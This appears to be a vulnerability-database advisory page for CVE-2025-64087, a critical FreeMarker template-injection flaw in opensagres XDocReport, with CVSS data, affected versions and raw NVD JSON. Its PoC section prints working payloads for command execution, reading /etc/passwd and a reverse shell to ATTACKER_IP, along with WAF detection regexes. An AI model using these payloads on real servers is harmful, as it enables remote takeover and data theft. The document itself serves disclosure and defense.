Security Vulnerability Report
CVE-2025-64087 CVSS 9.8 CRITICAL

CVE-2025-64087

Published: 2026-01-20 16:16:06
Last Modified: 2026-02-03 21:50:00

Description

A Server-Side Template Injection (SSTI) vulnerability in the FreeMarker component of opensagres XDocReport v1.0.0 to v2.1.0 allows attackers to execute arbitrary code via injecting crafted template expressions.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:opensagres:xdocreport:*:*:*:*:*:*:*:* - VULNERABLE
opensagres XDocReport v1.0.0
opensagres XDocReport v1.1.0
opensagres XDocReport v1.2.0
opensagres XDocReport v2.0.0
opensagres XDocReport v2.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64087 PoC - XDocReport FreeMarker SSTI
# Attack payload to execute arbitrary system commands

# Payload 1: Basic command execution via FreeMarker Execute class
payload_rce = '''${("freemarker.template.utility.Execute"?new())("whoami")}'''

# Payload 2: Read /etc/passwd file
payload_read = '''${(org.apache.commons.io.FileUtils?new().readFileToString("/etc/passwd"))}'''

# Payload 3: Reverse shell connection
payload_shell = '''${("freemarker.template.utility.Execute"?new())("bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1")}'''

# Payload 4: Using object construction chain
payload_chain = '''<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}'''

# Exploit scenario in XDocReport context:
def exploit_xdocreport(target_url, template_input):
    """
    Simulate exploitation of XDocReport SSTI vulnerability
    """
    malicious_template = f"""
    Document Title: ${{document_title}}
    Content: {payload_rce}
    """
    # The template is processed by FreeMarker without sanitization
    # Result: Command execution on the server
    return malicious_template

# Detection pattern for WAF/IDS:
detection_patterns = [
    r'\$\{.*freemarker.*\}',
    r'\$\{.*\.new\(\).*\}',
    r'\$\{.*utility\.Execute.*\}',
    r'<#assign.*new\(\)\s*>',
    r'\$\{.*\.data_model.*\}'
]

print("[+] CVE-2025-64087 PoC Generated")
print("[*] Target: opensagres XDocReport v1.0.0 - v2.1.0")
print("[*] Vulnerability: FreeMarker SSTI -> RCE")

References

https://github.com/AT190510-Cuong/CVE-2025-64087-SSTI- (Broken Link)
https://github.com/opensagres/xdocreport (Product)
https://github.com/opensagres/xdocreport/pull/705 (Issue Tracking, Third Party Advisory)
https://hackmd.io/@cuongnh/BJEnw7SAlg (Permissions Required)
https://hackmd.io/@cuongnh/SkQvhEf0lx (Permissions Required)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64087",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T16:16:06.070",
    "lastModified": "2026-02-03T21:49:59.897",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "A Server-Side Template Injection (SSTI) vulnerability in the FreeMarker component of opensagres XDocReport v1.0.0 to v2.1.0 allows attackers to execute arbitrary code via injecting crafted template expressions."},
      {"lang": "es", "value": "Una vulnerabilidad de Inyección de Plantillas del Lado del Servidor (SSTI) en el componente FreeMarker de opensagres XDocReport v1.0.0 a v2.1.0 permite a los atacantes ejecutar código arbitrario mediante la inyección de expresiones de plantilla manipuladas."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-1336"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:opensagres:xdocreport:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.0.0",
                "versionEndIncluding": "2.1.0",
                "matchCriteriaId": "8D83BE34-198C-4EA3-AFFC-BD47A6949BF4"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/AT190510-Cuong/CVE-2025-64087-SSTI-", "source": "[email protected]", "tags": ["Broken Link"]},
      {"url": "https://github.com/opensagres/xdocreport", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://github.com/opensagres/xdocreport/pull/705", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]},
      {"url": "https://hackmd.io/@cuongnh/BJEnw7SAlg", "source": "[email protected]", "tags": ["Permissions Required"]},
      {"url": "https://hackmd.io/@cuongnh/SkQvhEf0lx", "source": "[email protected]", "tags": ["Permissions Required"]}
    ]
  }
}